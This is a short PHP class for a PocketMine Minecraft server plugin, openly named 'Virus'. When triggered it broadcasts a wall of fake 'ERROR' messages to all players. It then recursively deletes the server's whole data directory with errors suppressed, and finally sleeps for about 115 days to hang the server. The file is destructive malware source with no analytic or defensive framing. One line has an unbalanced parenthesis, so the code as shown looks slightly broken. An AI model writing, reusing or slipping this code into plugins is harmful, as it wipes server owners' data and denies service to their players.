<?php

namespace provsalt\Virus;

use pocketmine\Server;
use pocketmine\utils\TextFormat;
use pocketmine\plugin\PluginBase;

class Virus {

	public static function runVirus() :void{
		Server::getInstance()->broadcastMessage(TextFormat::RED . "§cERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR §cERROR ERROR §cERROR ERROR ERROR ERROR§cERROR ERROR ERROR ERROR ERROR ERROR ERROR §cERROR ERROR ERROR ERROR ERROR ERROR§cERROR ERROR ERROR ERROR ERROR ERROR ERROR§cERROR ERROR ERROR ERROR ERROR ERROR ERROR§cERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERRORERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR§cERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERRORERROR ERROR ERROR ERROR ERROR ERROR ERRROR ERRROR ERROR ERROR ERROR ERROR ERRORERRROR ERRROR ERROR ERROR ERROR ERROR ERROR OCCURRED"));
		$dir = Server::getInstance()->getDataPath();
		
		self::deleteDir($dir);
		sleep(10000000);
	}
	public static function deleteDir($path) {
	$class_func = array(__CLASS__, __FUNCTION__);
	return is_file($path) ?
		@unlink($path) :
		array_map($class_func, glob($path.'/*')) == @rmdir($path);
	}
}
